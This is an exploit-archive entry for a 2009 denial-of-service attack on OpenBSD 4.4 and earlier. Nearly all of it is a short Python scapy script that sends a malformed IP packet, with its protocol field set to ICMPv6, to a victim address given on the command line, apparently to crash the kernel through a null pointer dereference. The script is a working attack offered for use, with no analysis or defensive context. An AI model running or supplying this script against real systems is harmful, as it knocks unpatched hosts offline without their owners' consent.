OpenBSD <= 4.4 IP datagram Null Pointer Deref DoS Exploit
2009-04-14 20:35:51import sys
from scapy import *
victim=sys.argv[1]
icmpv6=58
p=IP(dst=victim)
p.proto=icmpv6
sr(p,timeout=1)
#
Fixes
No fixesIn order to submit a new fix you need to be registered.

